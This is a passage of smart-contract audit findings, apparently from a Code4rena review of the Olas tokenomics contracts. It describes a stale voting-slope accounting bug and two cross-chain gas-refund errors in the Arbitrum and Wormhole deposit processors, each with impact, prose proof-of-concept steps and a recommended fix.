However, when a nominee is removed by the owner through the removeNominee function, only pointsSum.bias is updated. pointsSum.slope is not updated, nor is it updated when users revoke their votes through the revokeRemovedNomineeVotingPower function. As a result, the pointsSum.slope for the next timestamp will be incorrect as it still includes the removed nominee's slope.

When the _getSum() function is called later to perform a checkpoint, the incorrect slope will be used for the calculation, causing the voting weight logic to become inaccurate:

function _getSum() internal returns (uint256) {
    // t is always > 0 as it is set in the constructor
    uint256 t = timeSum;
    Point memory pt = pointsSum[t];
    for (uint256 i = 0; i < MAX_NUM_WEEKS; i++) {
        if (t > block.timestamp) {
            break;
        }
        t += WEEK;
        uint256 dBias = pt.slope * WEEK;
        if (pt.bias > dBias) {
            pt.bias -= dBias;
            uint256 dSlope = changesSum[t];
            pt.slope -= dSlope;
        } else {
            pt.bias = 0;
            pt.slope = 0;
        }

        pointsSum[t] = pt;
        if (t > block.timestamp) {
            timeSum = t;
        }
    }
    return pt.bias;
}

Impact

The voting weight logic will be inaccurate after a nominee is removed, potentially compromising the integrity of the governance mechanism.

Tools Used

Manual review, VS Code

Recommended Mitigation

To address this issue, ensure that pointsSum.slope is updated when a nominee is removed. This can be done in either the removeNominee or revokeRemovedNomineeVotingPower functions to maintain correct accounting.

Assessed type

Error

User's gas fees for Arbitrum messages are not refunded and will be lost

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/ArbitrumDepositProcessorL1.sol#L136
https://github.com/code-423n4/2024-05-olas/blob/main/tokenomics/contracts/staking/WormholeDepositProcessorL1.sol#L85

Vulnerability details

In ArbitrumDepositProcessorL1._sendMessage(), if the refundAccount is not explicitly set by the user, it defaults to msg.sender:

File: ArbitrumDepositProcessorL1.sol
134:         // If refundAccount is zero, default to msg.sender
135:         if (refundAccount == address(0)) {
136:             refundAccount = msg.sender;
137:         }

However, this address will always be the Dispenser contract making the call on behalf of the user, as verified in the super.sendMessage() entry point. This means any refunds will go to the Dispenser contract on L2 (or more specifically, to its L2 aliased address) rather than the user.

The same issue is present in WormholeDepositProcessorL1.

Impact

Users will lose any excess gas fees they send as part of their token deposits. Since users cannot precisely estimate the gas required, they are incentivized to err on the side of overpaying to ensure their deposit succeeds. All this overpaid amount will be lost.

Proof of Concept

  1. User calls claimStakingIncentives() on the Dispenser contract to send staking incentives to L2 without specifying a refundAccount.
  2. Dispenser calls _sendMessage() on ArbitrumDepositProcessorL1, passing in the deposit data.
  3. Since no refundAccount was specified, it defaults to msg.sender which is the Dispenser contract.
  4. outboundTransferCustomRefund() is called on the Arbitrum L1GatewayRouter to bridge the tokens as well as createRetryableTicket() on the Inbox, with the Dispenser set as the refundAccount.
  5. On L2, excess gas is refunded to the aliased Dispenser contract.
  6. The excess gas is not refunded to the user, and the Dispenser contract lacks functionality to rescue excess funds sent to its aliased address on Arbitrum.

Tools Used

Manual review

Recommended Mitigation Steps

Instead of defaulting refundAccount to msg.sender, use tx.origin. This will ensure any refunds go to the original user initiating the deposit at the very beginning of the call chain.

Assessed type

ETH-Transfer

Refunds for unconsumed gas will be lost due to incorrect refund chain ID

Lines of code

https://github.com/code-423n4/2024-05-olas/blob/3ce502ec8b475885b90668e617f3983cea3ae29f/tokenomics/contracts/staking/WormholeDepositProcessorL1.sol#L97

Vulnerability details

The WormholeDepositProcessorL1 contract allows sending tokens and data via the Wormhole bridge from L1 to L2. It uses the sendTokenWithPayloadToEvm() function from the TokenBase contract in the Wormhole Solidity SDK to send the tokens and payload.

The sendTokenWithPayloadToEvm() function takes several parameters, including:

  • targetChain - the Wormhole chain ID of the destination chain
  • refundChain - the Wormhole chain ID of the chain where refunds for unconsumed gas should be sent

In the WormholeDepositProcessorL1._sendMessage() function, the refundChain parameter is incorrectly set to l2TargetChainId, which is the EVM chain ID of the receiving L2 chain:

File: WormholeDepositProcessorL1.sol
94:         // The token approval is done inside the function
95:         // Send tokens and / or message to L2
96:         sequence = sendTokenWithPayloadToEvm(uint16(wormholeTargetChainId), l2TargetDispenser, data, 0,
97:             gasLimitMessage, olas, transferAmount, uint16(l2TargetChainId), refundAccount);

However, it should be set to wormholeTargetChainId, which is the Wormhole chain ID classification corresponding to the L2 chain ID. Passing the l2TargetChainId as targetChain and casting it to uint16 will lead to refunds for unconsumed gas being sent to an altogether different chain (only if they are sufficient to be delivered, as explained in the Wormhole docs here) or lost.

Impact

Refunds for unconsumed gas paid by users when sending tokens from L1 to L2 via the Wormhole bridge will likely be lost. This results in users overpaying for gas.

Proof of Concept

  1. User calls claimStakingIncentives() on the Dispenser contract for a nominee on Celo
  2. WormholeDepositProcessorL1._sendMessage() is called internally, which calls TokenBase.sendTokenWithPayloadToEvm()
  3. The refundChain parameter in sendTokenWithPayloadToEvm() is set to l2TargetChainId instead of wormholeTargetChainId
  4. Refunds for unconsumed gas are sent to the wrong chain ID or lost

Tools Used

Manual review

Recommended Mitigation Steps

Change the refundChain parameter in the sendTokenWithPayloadToEvm() call to use wormholeTargetChainId instead of l2TargetChainId.
``

Assessed type

Other

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.